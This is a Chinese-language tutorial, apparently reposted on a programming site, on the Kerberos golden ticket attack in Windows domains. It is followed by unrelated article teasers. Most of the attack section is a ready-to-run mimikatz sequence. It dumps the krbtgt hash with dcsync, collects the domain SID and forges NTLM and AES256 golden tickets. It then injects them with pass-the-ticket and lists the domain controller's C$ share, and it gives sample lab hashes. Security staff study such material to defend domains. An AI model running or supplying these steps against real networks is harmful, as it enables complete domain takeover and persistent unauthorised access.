黄金票据攻击

黄金票据攻击——域内横向移动技术

一、黄金票据攻击介绍:

黄金票据攻击是一种滥用Kerberos身份认证协议的攻击方式,它允许攻击者伪造域控krbtgt用户的TGT(Ticket-Granting Ticket)。通过这种方法,攻击者可以生成有效的TGT Kerberos票据,且这些票据不受TGT生命周期的影响(TGT默认生命周期为10小时,最多可续订7天)。因此,攻击者能够访问网络中的任何资源,而无需知道任何有效用户的账户凭据。

具体来说,黄金票据攻击可以为任意用户生成TGT票据,这意味着攻击者甚至可以为域管理员生成TGT,从而使普通用户获得域管理员的权限。这种攻击方式利用了Kerberos中的一个漏洞,使得攻击者能够绕过系统控制机制,直接访问目标系统的所有资源。

在实施攻击时,攻击者通常会在目标主机上运行恶意软件或使用其他恶意攻击手段,通过收集系统中存在的凭证或使用暴力破解等方式获取有效TGT凭证。在Windows系统中,攻击者还可以利用已获得的权限或漏洞进行票据提权,进一步提升自己的权限并获取黄金票据。

二、黄金票据的制作条件

  1. 域名称:需要知道目标网络的域名称,这是Kerberos协议进行身份验证的基础。

  2. 域的SID:SID(安全标识符)是唯一的,用于标识Windows操作系统中的安全主体(如用户账户、组账户等)。制作黄金票据需要知道目标域的SID。

  3. 域控的Krbtgt账户的密码hash值:Krbtgt是Kerberos认证服务中的账户,用于发放TGT(票据授权票据)。攻击者需要获取该账户的密码hash值,才能伪造有效的TGT。这通常需要在攻击者已经具有活动域管理员权限的情况下完成,因为Krbtgt账户的密码hash值存储在域控制器上。

  4. 任意域用户名:为了伪造有效的TGT,攻击者还需要一个域内的用户名。这样,伪造的TGT将看似是由该用户发出的。

三、制作黄金票据,即伪造TGT

1、获取Krbtgt的hash
首先以管理员权限,在域控制器上执行mimikatz命令:
privilege::debug
lsadump::dcsync /user:krbtgt

记录Krbtgt用户的以下信息:
Hash NTLM: 4c32d497137ce2fbc28c297e73a87889
aes256_hmac: 414818be77de302b3801226cfe04599fb9aabfe114231a29d1386ee4d6507067

2、域sid
在普通域成员机器上,使用 “whoami /user” 获取。

记录普通域用户id信息:
student01:S-1-5-21-3792756393-3386897061-2081858749

3、域账户
域账户:student01

4.域名
在普通域成员机器上,使用 “systeminfo” 获取。

记录域名:college.com

制作黄金票据所需内容

Hash NTLM:4c32d497137ce2fbc28c297e73a87889
域名:college.com
域账户:student01
域sid:S-1-5-21-3792756393-3386897061-2081858749

使用mimikatz制作黄金票据

在获取上面信息后,使用mimikatz工具生成黄金票据(普通域用户权限即可制作),过程如下:

1、查看当前票据
kerberos::list

2、清空票据 #防止之前的票据对新作的票据产生影响
kerberos::purge

3、制作黄金票据 /admin:用户名任意 /ticket:票据名称任意即可
kerberos::golden /admin:administrator /domain:college.com /sid:S-1-5-21-3792756393-3386897061-2081858749 /krbtgt:4c32d497137ce2fbc28c297e73a87889 /ticket:ticket.kirbi

会在当前目录下生成黄金票据:

4、导入黄金票据
kerberos::ptt ticket.kirbi
kerberos::list

5、在普通域用户机器上,重新打开cmd窗口,可以直接列出域控目录
dir \dc.college.com\c$

6、使用aes256也可以制作黄金票据。
原理和上面的是一样的,只是hash不同而已。
kerberos::golden /domain:school.com /sid:S-1-5-21-2236738896-1661306322-1924668396 /aes256:87d3913d6cb96fef6fcc7a616ee33625bec4b8cffc7a2efa7f177541dd7d3d9c /user:hello /ticket:aes256.kirbi

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/587375.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue2项目安装(使用vue-cli脚手架)

使用npm安装 安装镜像(使npm创建项目更快):镜像可更换 npm config set registry https://registry.npmmirror.com1.全局安装vue-cli(一次) npm install -g vue/cli 2. 查看vue-cli 版本 vue --version 3. 创建项目…

“两化”融合试点名单汇总数据(2014至2018年)

01、数据简介 两化融合是指信息化和工业化的高层次的深度结合,其核心在于信息化支撑,追求可持续发展模式。 “两化”融合贯标试点只针对制造业企业,解释变量“两化”融合贯标试点数据来自工业和信息化部办公厅公布的试点名单以及“两化融合…

C语言一维数组及二维数组详解

引言: 小伙伴们,我发现我正文更新的有些慢,但相信我,每一篇文章真的都很用心在写的,哈哈,在本篇博客当中我们将详细讲解一下C语言中的数组知识,方便大家后续的使用,有不会的也可以当…

Redis缓存设计与性能优化【缓存穿透、缓存击穿、缓存雪崩】

Redis缓存设计与性能优化 多级缓存架构缓存设计缓存穿透(空数据)造成缓存穿透的基本原因有两个:第一, 自身业务代码或者数据出现问题。第二, 一些恶意攻击、 爬虫等造成大量空命中。 缓存穿透问题解决方案:…

类和对象的下篇

𝙉𝙞𝙘𝙚!!👏🏻‧✧̣̥̇‧✦👏🏻‧✧̣̥̇‧✦ 👏🏻‧✧̣̥̇:Solitary_walk ⸝⋆ ━━━┓ - 个性标签 - :来于“云”的“羽球人”。…

《Git版本控制管理》笔记

第三章 git --version查看版本号git --help查看帮助文档裸双破折号分离参数 git diff -w master origin – tools/Makefile将当前目录或任何目录转化为Git版本库 git init 初始化之后项目目录中,有名为.git的文件git status 查看git状态git commit 提供日志消息和作…

数据可视化:智慧农业发展的催化剂

数据可视化在智慧农业中发挥着不可替代的作用。随着科技的不断进步,农业领域也在不断探索创新,以提高生产效率、优化资源利用,从而实现可持续发展。而数据可视化技术的应用,则成为了实现智慧农业目标的重要途径。下面我就从可视化…

晚间兼职攻略:六个副业轻松上手

晚上兼职副业,作为增加额外收入的途径,选择多样且灵活。以下是六个特别适合晚上进行的副业,让你在闲暇时光也能充实自我,获得收益。 1,网络调查与市场研究是一个值得考虑的选项。你可以在晚上抽出空闲时间&#xff0c…

获取用户位置数据,IP定位离线库助您洞悉消费者需求

获取用户位置数据是现代互联网应用中非常重要的一环。通过获取用户的位置数据,可以了解用户所在的地理位置,从而更好地为用户提供个性化的服务和推荐。而IP归属地离线库就是一种非常有用的工具,可以帮助企业准确地获取用户的位置信息。 IP归…

Python控制浏览器——selenium模块

Python控制浏览器——selenium模块 目录 Python控制浏览器——selenium模块准备工作【1】安装selenium【2】安装浏览器驱动【3】测试驱动(作者是Edge) 导航和操作窗口导航返回前进刷新最大化窗口切换选项卡 查找和操作元素8种基本By定位方式[1]ID[2]Name…

HTML基础:脚本 script 标签

你好,我是云桃桃。 1枚程序媛,大专生,2年时间从1800到月入过万,工作5年买房。 分享成长心得。 255篇原创内容-公众号 后台回复“前端工具”可获取开发工具,持续更新中 后台回复“前端基础题”可得到前端基础100题汇…

[Linux] 排查问题指令top/ps/netstat

在Linux下查看某个端口运行的指令 1. 首先通过netstat来查看端口对应的进程号 比如抓取端口53这个DNS服务的进程 netstat -tulnp | grep 53 可以看到53这个端口号对应的pid是720 2. 通过ps指令来对进程号执行的命令查询 ps aux | grep 720 可以看到pid为720这个进程对应的执…